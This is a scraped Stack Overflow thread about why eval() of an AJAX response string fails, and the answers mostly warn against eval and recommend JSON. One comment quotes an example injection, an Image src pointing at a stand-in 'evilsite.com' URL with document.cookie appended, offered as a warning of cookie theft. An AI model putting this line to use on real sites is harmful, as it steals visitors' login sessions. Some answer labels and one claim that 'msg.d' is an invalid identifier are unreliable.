Evaluate the string as object (javascript)

Question

Here is the problem string:

$.ajax(......
   ,success:function(msg){
      var obj = eval('['+msg.d+']');
   },
   ....
}

msg.d contains something like:

new Person(2, 'Name Surname','This is just string came from Par'is at Sat'urday');

How can pass the javascript problem ?

eval() is EVIL. eval() will evaluate EVERYTHING in the string, be it good or not, depending on where you feed the Person data from, you might end up with a big security issue down the road. If a user manages to sneak something like "new Image().src = 'http://evilsite.com/steal?c=' + document.cookie" as the surname into your database, your page will still run perfectly fine, only 2 things will differ 1. The Surname will be empty and 2. the login cookie of the visitor will just have been stolen. Please look into JSON so you can safely pass the data to the client without the risks of eval — Ivo Wetzel
– Ivo Wetzel, Commented Oct 19, 2010 at 15:09
the Ajax call does not make assumption of the type of data returned by the server side script so msg is only a string, and a string doesn't have a 'd' property. — dvhh
– dvhh, Commented Oct 20, 2010 at 4:33

Community · Accepted Answer · 2017-05-23 12:18:38Z

6

If the string really is as you've quoted it, it has a syntax error and will not work (it has an errant ' inside the word "Saturday"). Otherwise, though, change the brackets ([ and ]) in your eval call to parentheses (( and )):

var obj = eval('('+msg.d+')');

However, it should almost never actually be necessary to do this (or indeed to use eval at all). It's almost always possible, and desirable, to refactor slightly and avoid it.

If that's a literal quote from your code, see also dvhh's answer below, your function argument name (msg.d) is invalid.

edited May 23, 2017 at 12:18

CommunityBot

11 silver badge

answered Oct 19, 2010 at 14:07

T.J. Crowder

1.1m201 gold badges2k silver badges2k bronze badges

Sign up to request clarification or add additional context in comments.

Comments

Eric Mickelsen · Accepted Answer · 2010-10-19 14:07:26Z

1

Using eval in this scenario is actual quite dangerous. You really ought to be using XML or JSON. (That's why they call it AJAX.)

answered Oct 19, 2010 at 14:07

Eric Mickelsen

10.4k2 gold badges33 silver badges41 bronze badges

6 Comments

Nick Craver Over a year ago

To be clear, the J in AJAX is for JavaScript, not JSON...and a string fits under that category.

Eric Mickelsen Over a year ago

@Nick, I was referring to the X. And the J doesn't refer to using Javascript code as a communication medium via eval.

Nick Craver Over a year ago

@Eric - JSON doesn't provide a way to pass an executable function either, so what would it directly solve here?

Eric Mickelsen Over a year ago

@Nick, There's no mention of passing functions in the message (in the OP). The example is just a simple object, which JSON is well-suited for. If anyone has an urge to pass a function as a message, I would reconsider that, since it is likely a major design flaw.

Nick Craver Over a year ago

@Eric - The object could be any of 30 types for example, maybe he gets a Person, or a Class or a Car...you're making some assumptions here that it's an easy thing to bypass :)

|

dvhh · Accepted Answer · 2010-10-19 14:11:07Z

1

the function argument should be a valid javascript identifier

try changing msg.d to msg_d for example

answered Oct 19, 2010 at 14:11

dvhh

4,73829 silver badges34 bronze badges

Comments

wildpeaks · Accepted Answer · 2010-10-19 14:13:49Z

1

You may need to escape your string, because this example works fine:

function MyObject(myvar){
    this.hello = function(){
        alert('myvar= ' + myvar);
    };
}

var obj1 = new MyObject('hello');
obj1.hello();

var obj2 = eval("new MyObject('world')"); 
obj2.hello();

(Edit: By the way, I assume msg.d is a typo due to editing the snipplet before posting on StackOverflow ?)

answered Oct 19, 2010 at 14:13

wildpeaks

7,4222 gold badges34 silver badges36 bronze badges

1 Comment

wildpeaks Over a year ago

If you have control over the server-side, I would advise to use JSON (or XML, but it slightly slower), that makes things more maintainable and it's easy to use in (I assume you use jQuery due to the $.ajax), just change the "dataType" field to 'json' and you get directly receive a nice structure in the success handler).

Colin O'Dell · Accepted Answer · 2010-10-19 14:09:18Z

0

I would avoid using eval() for security reasons. If a user can get malicious code into the database, there's a chance it could end up in this eval expression, wreaking havoc for anybody who visits this page.

Instead of using eval, I'd recommending returning JSON from the AJAX request. You can then easily parse the values and build a new Person object with that data.

answered Oct 19, 2010 at 14:09

Colin O'Dell

8,7178 gold badges41 silver badges75 bronze badges

Collectives™ on Stack Overflow

Evaluate the string as object (javascript)

5 Answers 5

Comments

6 Comments

Comments

1 Comment

Comments

Your Answer

Hot Network Questions

Collectives™ on Stack Overflow

5 Answers 5

Comments

6 Comments

Comments

1 Comment

Comments

Your Answer

Sign up or log in

Post as a guest

Related